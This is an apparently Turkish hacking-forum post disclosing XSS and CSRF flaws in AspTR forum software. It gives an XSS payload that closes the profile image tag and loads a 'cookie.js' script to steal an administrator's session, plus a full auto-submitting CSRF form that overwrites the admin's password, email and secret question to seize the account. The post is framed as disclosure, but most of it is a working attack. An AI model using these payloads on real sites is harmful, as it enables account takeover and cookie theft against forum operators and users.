| AspTR All version CSRF ve XSS
Güvenlik açığı [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] sitesinde yayınlandı.
ilk önce XSS den bahsetmek istiyorum . Betik normal üyelerin profillerindeki resim yolundan kaynaklanıyor.
değişkenlere baktığımızda dilediğimizi yazabildiğimizi görebiliyoruz ve resimde de hiç bir filtrelemenin olmadığını görüyoruz .
örnek = <img src="sitedebelirtilenresimyolu.jpg"/>
Profilde hiç bir filtreleme yoluna gitmemiş o zaman düşünüyoruz adam foto seçimi eklemiş ve bunun betiğimizi <img src="sitedebelirtilenresimyolu.jpg"/> gibi bir tag aralığında yayınlanmasını sağlamış + olarak adam bana hiç bir kısıtlama getirmemiş o zaman ben profilimdeki resim kodumu "/> şeklinde kapatarak yeni taga geçiş yapıyorum ve update ediyorum.
siteresmi.jpg"/><script src="cookie.js"/> bundan sonrası ise oyuncak zaten foruma basit bir konu açarak adminin konuya girmesini sağlamam onu hacklemem için yeterli bi neden olacaktır.
ikinci bir güvenlik açığı ise CSRF profil updatede hiç bir filtreleme yok o zaman aşağıdaki betiğe yöneticiyi tıklatmak yeni adminin bizim olmamızı sağlayacak kadar yeterli bir nedendir .
| | Alıntı: |
<frewal>
Target site :<form method="POST" action="
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
type="text" name="sifre" size="49" value="sifre"></p>
<p>E-Mail : <input type="text" name="mail" size="49" value="mail"></p>
<p>Secret question : <input type="text" name="soru" size="49" value="soru"></p>
<p><span id="result_box" class="short_text"><span style title>Reply
: </span></span><input type="text" name="cevap" size="49" value="cevap"></p>
<p>Name : <input type="text" name="ad" size="49" value="ad"></p>
<p>Last Name : <input type="text" name="soyad" size="49" value="soyad"></p>
<p>Dont Changing : <select size="1" name="sehir" id="sehir">
<option value="Adana">Adana</option></p>
<p>Profession :<input type="text" name="meslek" size="49" value="meslek"></p>
<p>Msn :<input type="text" name="msn" size="49" value="msn"></p>
<p>Web :<input type="text" name="web" size="49" value="web"></p>
<p>
***
:<select name="cinsiyet" size="1">
<option>Bay</option>
<option>Bay</option>
<option>Bayan</option>
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
<script> document.forms[0].submit() </script>
</form>
</frewal>
|
umuyoruzki script masterleri kisa sürede acigi kapatma yoluna giderler.
olympos.net
|